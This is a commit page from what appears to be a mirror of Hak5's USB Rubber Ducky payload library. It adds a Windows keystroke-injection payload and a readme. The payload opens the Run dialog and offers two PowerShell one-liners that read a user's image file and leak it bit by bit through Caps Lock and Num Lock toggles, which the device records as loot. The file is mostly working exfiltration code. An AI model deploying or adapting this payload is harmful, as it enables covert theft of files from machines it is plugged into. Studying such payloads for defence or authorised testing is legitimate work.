hak5
/
usbrubberducky-payloads
mirror of https://github.com/hak5/usbrubberducky-payloads.git
1
0
Fork 0
Code Issues Packages Projects Releases Wiki Activity

Merge pull request #124 from cribb-it/SendImage 

Image over key reflection
pull/139/head
Darren Kitchen 2022-09-01 14:18:05 -05:00 committed by GitHub
parent 13cebec10e 2ba0b3e08c
commit e2527f733b
No known key found for this signature in database
GPG Key ID: 4AEE18F83AFDEB23
2 changed files with 63 additions and 0 deletions
Show Stats Download Patch File Download Diff File Expand all files Collapse all files

41
payloads/library/exfiltration/Win_Hid_ImgOverKey/payload.txt Normal file
View File

@ -0,0 +1,41 @@
DELAY 3000
REM Title: Image over key reflection
REM Author: Cribbit
REM Description: Proof of concept for send an image over key reflection using two methods
REM Target: Windows 10
REM Props: Korban, Darren, I-Am-Jakoby
REM Config: You will need to change the path to an image at the moment it points to C:\Users\{Current user}\test.jpg
REM Note: this will take forever a 807 bytes file took about 7 mins.
ATTACKMODE HID
LED_OFF
DELAY 2000
SAVE_HOST_KEYBOARD_LOCK_STATE
$_EXFIL_MODE_ENABLED = TRUE
$_EXFIL_LEDS_ENABLED = TRUE
GUI r
DELAY 200
REM The "string method" is fast to encode than the check each bit but is 20 char longer.
REM This reads the image by bytes converts each byte to a binary string. Pads the string to 8 zero. then replaces the 1 and 0's with the lock keys
REM UN-REM THE LINE BELOW TO USES
REM STRINGLN powershell "gc $env:USERPROFILE\test.jpg -En By|%{$k+=([convert]::ToString($_,2).PadLeft(8,'0')-replace'0','%{CAPSLOCK}'-replace'1','%{NUMLOCK}')};$k+='%{SCROLLLOCK}';Add-Type -A *m.W*s.F*s;[System.Windows.Forms.SendKeys]::SendWait($k)"
REM This bit version it is slightly short then the example payload for hak5.
REM By replacing the all hex value that it uses to check each bit agaist each byte.
REM by piping 7 down to 0 then left shifing 1 by this value i.e. 1 -shl 7 = (bin 10000000, hex 80 dec 128) to 1 -shl 0 = (bin 00000001, hex 1 dec 1)
REM UN-REM THE LINE BELOW TO USES
REM STRINGLN powershell "gc $env:USERPROFILE\test.jpg -En By|%{$b=$_;7..0|%{if($b-band(1-shl$_)){$k+='%{NUMLOCK}'}else{$k+='%{CAPSLOCK}'}}};$k+='%{SCROLLLOCK}';Add-Type -A *m.W*s.F*s;[System.Windows.Forms.SendKeys]::SendWait($k)"
WAIT_FOR_SCROLL_CHANGE
LED_G
$_EXFIL_MODE_ENABLED = FALSE
RESTORE_HOST_KEYBOARD_LOCK_STATE
ATTACKMODE STORAGE
REM When storage shows rename the loot.bin extension to the file extension in this case .jpg to view the file.

22
payloads/library/exfiltration/Win_Hid_ImgOverKey/readme.md Normal file
View File

@ -0,0 +1,22 @@
# Image over key reflection
- Author: Cribbit
- Version: 1.0
- Target: Windows (Powershell 5.1+)
- Category: exfiltration
- Attackmode: HID then Storage
## Change Log
| Version | Changes |
| ------- | --------------- |
| 1.0 | Initial release |
## Description
Proof of concept for send an image over key reflection using two methods of converting bytes to key presses.
## Config
Un-REM the method to try. And place and image at the C:\Users\{Current user}\test.jpg.
The smaller image the better a file of 807 bytes took about 7 mins.
## Props
To Darren and Korban for all the hard work they have put in to new ducky & key reflection. And for answering my questions i had about the ducky before i had it.
To I am Jakoby for shorting the System.Windows.Forms bit